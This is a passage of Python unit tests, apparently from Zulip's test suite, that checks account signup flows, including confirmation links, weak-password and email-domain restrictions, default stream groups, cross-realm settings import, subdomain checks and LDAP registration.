"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{
"password": password,
"key": find_key_by_email(email),
"terms": True,
"full_name": "New Guy",
"from_confirmation": "1",
},
)
self.assert_in_success_response(["We just need you to do one last thing."], result)
def test_signup_with_weak_password(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
with self.settings(PASSWORD_MIN_LENGTH=6, PASSWORD_MIN_GUESSES=1000):
result = self.client_post(
"/accounts/register/",
{
"password": "easy",
"key": find_key_by_email(email),
"terms": True,
"full_name": "New Guy",
"from_confirmation": "1",
},
)
self.assert_in_success_response(["We just need you to do one last thing."], result)
result = self.submit_reg_form_for_user(email, "easy", full_name="New Guy")
self.assert_in_success_response(["The password is too weak."], result)
with self.assertRaises(UserProfile.DoesNotExist):
# Account wasn't created.
get_user(email, get_realm("zulip"))
def test_signup_with_default_stream_group(self) -> None:
# Check if user is subscribed to the streams of default
# stream group as well as default streams.
email = self.nonreg_email("newguy")
password = "newpassword"
realm = get_realm("zulip")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
default_streams = []
existing_default_streams = DefaultStream.objects.filter(realm=realm)
self.assert_length(existing_default_streams, 1)
self.assertEqual(existing_default_streams[0].stream.name, "Verona")
default_streams.append(existing_default_streams[0].stream)
for stream_name in ["venice", "rome"]:
stream = get_stream(stream_name, realm)
do_add_default_stream(stream)
default_streams.append(stream)
group1_streams = []
for stream_name in ["scotland", "denmark"]:
stream = get_stream(stream_name, realm)
group1_streams.append(stream)
do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)
result = self.submit_reg_form_for_user(email, password, default_stream_groups=["group 1"])
self.check_user_subscribed_only_to_streams("newguy", default_streams + group1_streams)
def test_signup_two_confirmation_links(self) -> None:
email = self.nonreg_email("newguy")
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
first_confirmation_url = self.get_confirmation_url_from_outbox(email)
first_confirmation_key = find_key_by_email(email)
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
second_confirmation_url = self.get_confirmation_url_from_outbox(email)
# Sanity check:
self.assertNotEqual(first_confirmation_url, second_confirmation_url)
# Register the account (this will use the second confirmation url):
result = self.submit_reg_form_for_user(
email, password, full_name="New Guy", from_confirmation="1"
)
self.assert_in_success_response(
["We just need you to do one last thing.", "New Guy", email], result
)
result = self.submit_reg_form_for_user(email, password, full_name="New Guy")
user_profile = UserProfile.objects.get(delivery_email=email)
self.assertEqual(user_profile.delivery_email, email)
# Now try to to register using the first confirmation url:
result = self.client_get(first_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{
"password": password,
"key": first_confirmation_key,
"terms": True,
"full_name": "New Guy",
"from_confirmation": "1",
},
)
# Error page should be displayed
self.assertEqual(result.status_code, 404)
self.assert_in_response("The registration link has expired or is not valid.", result)
def test_signup_with_multiple_default_stream_groups(self) -> None:
# Check if user is subscribed to the streams of default
# stream groups as well as default streams.
email = self.nonreg_email("newguy")
password = "newpassword"
realm = get_realm("zulip")
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
DefaultStream.objects.filter(realm=realm).delete()
default_streams = []
for stream_name in ["venice", "verona"]:
stream = get_stream(stream_name, realm)
do_add_default_stream(stream)
default_streams.append(stream)
group1_streams = []
for stream_name in ["scotland", "denmark"]:
stream = get_stream(stream_name, realm)
group1_streams.append(stream)
do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)
group2_streams = []
for stream_name in ["scotland", "rome"]:
stream = get_stream(stream_name, realm)
group2_streams.append(stream)
do_create_default_stream_group(realm, "group 2", "group 2 description", group2_streams)
result = self.submit_reg_form_for_user(
email, password, default_stream_groups=["group 1", "group 2"]
)
self.check_user_subscribed_only_to_streams(
"newguy", list(set(default_streams + group1_streams + group2_streams))
)
def test_signup_without_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user("hamlet")
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
realm = get_realm("lear")
# Make an account in the Zulip realm, but we're not copying from there.
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post("/accounts/home/", {"email": email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email, password, source_realm_id="", HTTP_HOST=subdomain + ".testserver"
)
hamlet = get_user(self.example_email("hamlet"), realm)
self.assertEqual(hamlet.left_side_userlist, False)
self.assertEqual(hamlet.default_language, "en")
self.assertEqual(hamlet.emojiset, "google-blob")
self.assertEqual(hamlet.high_contrast_mode, False)
self.assertEqual(hamlet.enable_stream_audible_notifications, False)
self.assertEqual(hamlet.enter_sends, False)
self.assertEqual(hamlet.tutorial_status, UserProfile.TUTORIAL_WAITING)
def test_signup_with_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user("hamlet")
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
lear_realm = get_realm("lear")
self.login("hamlet")
with get_test_image_file("img.png") as image_file:
self.client_post("/json/users/me/avatar", {"file": image_file})
hamlet_in_zulip.refresh_from_db()
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post("/accounts/home/", {"email": email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
result = self.client_post(
"/accounts/register/",
{"password": password, "key": find_key_by_email(email), "from_confirmation": "1"},
subdomain=subdomain,
)
self.assert_in_success_response(
[
"Import settings from existing Zulip account",
"selected >\n Zulip Dev",
"We just need you to do one last thing.",
],
result,
)
result = self.submit_reg_form_for_user(
email,
password,
source_realm_id=str(hamlet_in_zulip.realm.id),
HTTP_HOST=subdomain + ".testserver",
)
hamlet_in_lear = get_user(email, lear_realm)
self.assertEqual(hamlet_in_lear.left_side_userlist, True)
self.assertEqual(hamlet_in_lear.default_language, "de")
self.assertEqual(hamlet_in_lear.emojiset, "twitter")
self.assertEqual(hamlet_in_lear.high_contrast_mode, True)
self.assertEqual(hamlet_in_lear.enter_sends, True)
self.assertEqual(hamlet_in_lear.enable_stream_audible_notifications, False)
self.assertEqual(hamlet_in_lear.tutorial_status, UserProfile.TUTORIAL_FINISHED)
zulip_path_id = avatar_disk_path(hamlet_in_zulip)
lear_path_id = avatar_disk_path(hamlet_in_lear)
with open(zulip_path_id, "rb") as f:
zulip_avatar_bits = f.read()
with open(lear_path_id, "rb") as f:
lear_avatar_bits = f.read()
self.assertGreater(len(zulip_avatar_bits), 500)
self.assertEqual(zulip_avatar_bits, lear_avatar_bits)
def test_signup_invalid_subdomain(self) -> None:
"""
Check if attempting to authenticate to the wrong subdomain logs an
error and redirects.
"""
email = "newuser@zulip.com"
password = "newpassword"
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
def invalid_subdomain(**kwargs: Any) -> Any:
return_data = kwargs.get("return_data", {})
return_data["invalid_subdomain"] = True
with patch("zerver.views.registration.authenticate", side_effect=invalid_subdomain):
with self.assertLogs(level="ERROR") as m:
result = self.client_post(
"/accounts/register/",
{
"password": password,
"full_name": "New User",
"key": find_key_by_email(email),
"terms": True,
},
)
self.assertEqual(
m.output,
["ERROR:root:Subdomain mismatch in registration zulip: newuser@zulip.com"],
)
self.assertEqual(result.status_code, 302)
def test_signup_using_invalid_subdomain_preserves_state_of_form(self) -> None:
"""
Check that when we give invalid subdomain and submit the registration form
all the values in the form are preserved.
"""
realm = get_realm("zulip")
password = "test"
email = self.example_email("iago")
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
result = self.submit_reg_form_for_user(
email,
password,
# Subdomain is already used, by construction.
realm_subdomain=realm.string_id,
realm_name=realm_name,
source_realm_id=str(realm.id),
)
self.assert_in_success_response(
[
"Subdomain unavailable. Please choose a different one.",
"Zulip Dev\n",
'value="test"',
'name="realm_name"',
],
result,
)
def test_replace_subdomain_in_confirmation_link(self) -> None:
"""
Check that manually changing the subdomain in a registration
confirmation link doesn't allow you to register to a different realm.
"""
email = "newuser@zulip.com"
self.client_post("/accounts/home/", {"email": email})
result = self.client_post(
"/accounts/register/",
{
"password": "password",
"key": find_key_by_email(email),
"terms": True,
"full_name": "New User",
"from_confirmation": "1",
},
subdomain="zephyr",
)
self.assert_in_success_response(["We couldn't find your confirmation link"], result)
def test_signup_to_realm_on_manual_license_plan(self) -> None:
realm = get_realm("zulip")
denmark_stream = get_stream("Denmark", realm)
realm.signup_notifications_stream = denmark_stream
realm.save(update_fields=["signup_notifications_stream"])
_, ledger = self.subscribe_realm_to_monthly_plan_on_manual_license_management(realm, 5, 5)
with self.settings(BILLING_ENABLED=True):
form = HomepageForm({"email": self.nonreg_email("test")}, realm=realm)
self.assertIn(
"New members cannot join this organization because all Zulip licenses",
form.errors["email"][0],
)
last_message = Message.objects.last()
self.assertIn(
f"A new member ({self.nonreg_email('test')}) was unable to join your organization because all Zulip",
last_message.content,
)
self.assertEqual(last_message.recipient.type_id, denmark_stream.id)
ledger.licenses_at_next_renewal = 50
ledger.save(update_fields=["licenses_at_next_renewal"])
with self.settings(BILLING_ENABLED=True):
form = HomepageForm({"email": self.nonreg_email("test")}, realm=realm)
self.assertIn(
"New members cannot join this organization because all Zulip licenses",
form.errors["email"][0],
)
ledger.licenses = 50
ledger.save(update_fields=["licenses"])
with self.settings(BILLING_ENABLED=True):
form = HomepageForm({"email": self.nonreg_email("test")}, realm=realm)
self.assertEqual(form.errors, {})
def test_failed_signup_due_to_restricted_domain(self) -> None:
realm = get_realm("zulip")
do_set_realm_property(realm, "invite_required", False, acting_user=None)
do_set_realm_property(realm, "emails_restricted_to_domains", True, acting_user=None)
email = "user@acme.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn(
f"Your email address, {email}, is not in one of the domains", form.errors["email"][0]
)
def test_failed_signup_due_to_disposable_email(self) -> None:
realm = get_realm("zulip")
realm.emails_restricted_to_domains = False
realm.disallow_disposable_email_addresses = True
realm.save()
email = "abc@mailnator.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn("Please use your real email address", form.errors["email"][0])
def test_failed_signup_due_to_email_containing_plus(self) -> None:
realm = get_realm("zulip")
realm.emails_restricted_to_domains = True
realm.save()
email = "iago+label@zulip.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn(
"Email addresses containing + are not allowed in this organization.",
form.errors["email"][0],
)
def test_failed_signup_due_to_invite_required(self) -> None:
realm = get_realm("zulip")
realm.invite_required = True
realm.save()
email = "user@zulip.com"
form = HomepageForm({"email": email}, realm=realm)
self.assertIn(f"Please request an invite for {email} from", form.errors["email"][0])
def test_failed_signup_due_to_nonexistent_realm(self) -> None:
email = "user@acme.com"
form = HomepageForm({"email": email}, realm=None)
self.assertIn(
f"organization you are trying to join using {email} does not exist",
form.errors["email"][0],
)
def test_access_signup_page_in_root_domain_without_realm(self) -> None:
result = self.client_get("/register", subdomain="", follow=True)
self.assert_in_success_response(["Find your Zulip accounts"], result)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_registration_from_confirmation(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
[
"We just need you to do one last thing.",
"New LDAP fullname",
"newuser@zulip.com",
],
result,
)
# Verify that the user is asked for name
self.assert_in_success_response(["id_full_name"], result)
# Verify that user is asked for its LDAP/Active Directory password.
self.assert_in_success_response(
["Enter your LDAP/Active Directory password.", "ldap-password"], result
)
self.assert_not_in_success_response(["id_password"], result)
# Test the TypeError exception handler
with patch(
"zproject.backends.ZulipLDAPAuthBackendBase.get_mapped_name", side_effect=TypeError
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
["We just need you to do one last thing.", "newuser@zulip.com"], result
)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipLDAPUserPopulator",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_populate_only_registration_from_confirmation(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_BIND_PASSWORD="",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE="uid=%(user)s,ou=users,dc=zulip,dc=com",
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
[
"We just need you to do one last thing.",
"New LDAP fullname",
"newuser@zulip.com",
],
result,
)
# Verify that the user is asked for name
self.assert_in_success_response(["id_full_name"], result)
# Verify that user is NOT asked for its LDAP/Active Directory password.
# LDAP is not configured for authentication in this test.
self.assert_not_in_success_response(
["Enter your LDAP/Active Directory password.", "ldap-password"], result
)
# If we were using e.g. the SAML auth backend, there
# shouldn't be a password prompt, but since it uses the
# EmailAuthBackend, there should be password field here.
self.assert_in_success_response(["id_password"], result)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_registration_end_to_end(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
full_name = "New LDAP fullname"
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
# Full name should be set from LDAP
self.assert_in_success_response(
["We just need you to do one last thing.", full_name, "newuser@zulip.com"], result
)
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(
email,
"wrongpassword",
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
# Didn't create an account
with self.assertRaises(UserProfile.DoesNotExist):
user_profile = UserProfile.objects.get(delivery_email=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
# Submit the final form with the correct password.
result = self.submit_reg_form_for_user(
email,
password,
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_split_full_name_mapping(self) -> None:
self.init_default_ldap_database()
ldap_user_attr_map = {"first_name": "sn", "last_name": "cn"}
subdomain = "zulip"
email = "newuser_splitname@zulip.com"
password = self.ldap_password("newuser_splitname")
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
# Test split name mapping.
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, "First Last")
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_auto_registration_on_login(self) -> None:
"""The most common way for LDAP authentication to be used is with a
server that doesn't have a terms-of-service required, in which
case we offer a complete single-sign-on experience (where the
user just enters their LDAP username and password, and their
account is created if it doesn't already exist).
This test verifies that flow.
"""
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {
"full_name": "cn",
"custom_profile_field__phone_number": "homePhone",
}
full_name = "New LDAP fullname"
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
self.login_with_return(email, password, HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
# Test custom profile fields are properly synced.
phone_number_field = CustomProfileField.objects.get(
realm=user_profile.realm, name="Phone number"
)
phone_number_field_value = CustomProfileFieldValue.objects.get(
user_profile=user_profile, field=phone_number_field
)
self.assertEqual(phone_number_field_value.value, "a-new-number")
@override_settings(AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",))
def test_ldap_auto_registration_on_login_invalid_email_in_directory(self) -> None:
password = self.ldap_password("newuser_with_email")
username = "newuser_with_email"
subdomain = "zulip"
self.init_default_ldap_database()
self.change_ldap_user_attr("newuser_with_email", "mail", "thisisnotavalidemail")
with self.settings(
LDAP_EMAIL_ATTR="mail",
), self.assertLogs("zulip.auth.ldap", "WARNING") as mock_log:
original_user_count = UserProfile.objects.count()
self.login_with_return(username, password, HTTP_HOST=subdomain + ".testserver")
# Verify that the process failed as intended - no UserProfile is created.
self.assertEqual(UserProfile.objects.count(), original_user_count)
self.assertEqual(
mock_log.output,
["WARNING:zulip.auth.ldap:thisisnotavalidemail is not a valid email address."],
)
@override_settings(AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",))
def test_ldap_registration_multiple_realms(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
self.init_default_ldap_database()
ldap_user_attr_map = {
"full_name": "cn",
}
do_create_realm("test", "test", emails_restricted_to_domains=False)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
subdomain = "zulip"
self.login_with_return(email, password, HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email, realm=get_realm("zulip"))
self.logout()
# Test registration in another realm works.
subdomain = "test"
self.login_with_return(email, password, HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email, realm=get_realm("test"))
self.assertEqual(user_profile.delivery_email, email)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_registration_when_names_changes_are_disabled(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link. This will 'authenticated_full_name'
# session variable which will be used to set the fullname of
# the user.
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
with patch("zerver.views.registration.name_changes_disabled", return_value=True):
result = self.submit_reg_form_for_user(
email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from LDAP session.
self.assertEqual(user_profile.full_name, "New LDAP fullname")
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_append_domain(self) -> None:
password = "nonldappassword"
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# If the user's email is inside the LDAP directory and we just
# have a wrong password, then we refuse to create an account
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because password was wrong
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# For the rest of the test we delete the user from ldap.
del self.mock_ldap.directory["uid=newuser,ou=users,dc=zulip,dc=com"]
# If the user's email is not in the LDAP directory, but fits LDAP_APPEND_DOMAIN,
# we refuse to create the account.
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
), self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because emails matching LDAP_APPEND_DOMAIN,
# aren't allowed to create non-LDAP accounts.
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: No LDAP user matching django_to_ldap_username result: newuser. Input username: newuser@zulip.com"
],
)
# If the email is outside of LDAP_APPEND_DOMAIN, we successfully create a non-LDAP account,
# with the password managed in the Zulip database.
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="example.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with self.assertLogs(level="WARNING") as m:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
self.assertEqual(
m.output,
["WARNING:root:New account email newuser@zulip.com could not be found in LDAP"],
)
with self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: Email newuser@zulip.com does not match LDAP domain example.com."
],
)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zulip.testserver/")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the POST request, not LDAP
self.assertEqual(user_profile.full_name, "Non-LDAP Full Name")
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_email_search(self) -> None:
# If the user's email is inside the LDAP directory and we just
# have a wrong password, then we refuse to create an account
password = "nonldappassword"
email = "newuser_email@zulip.com" # belongs to user uid=newuser_with_email in the test directory
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_EMAIL_ATTR="mail",
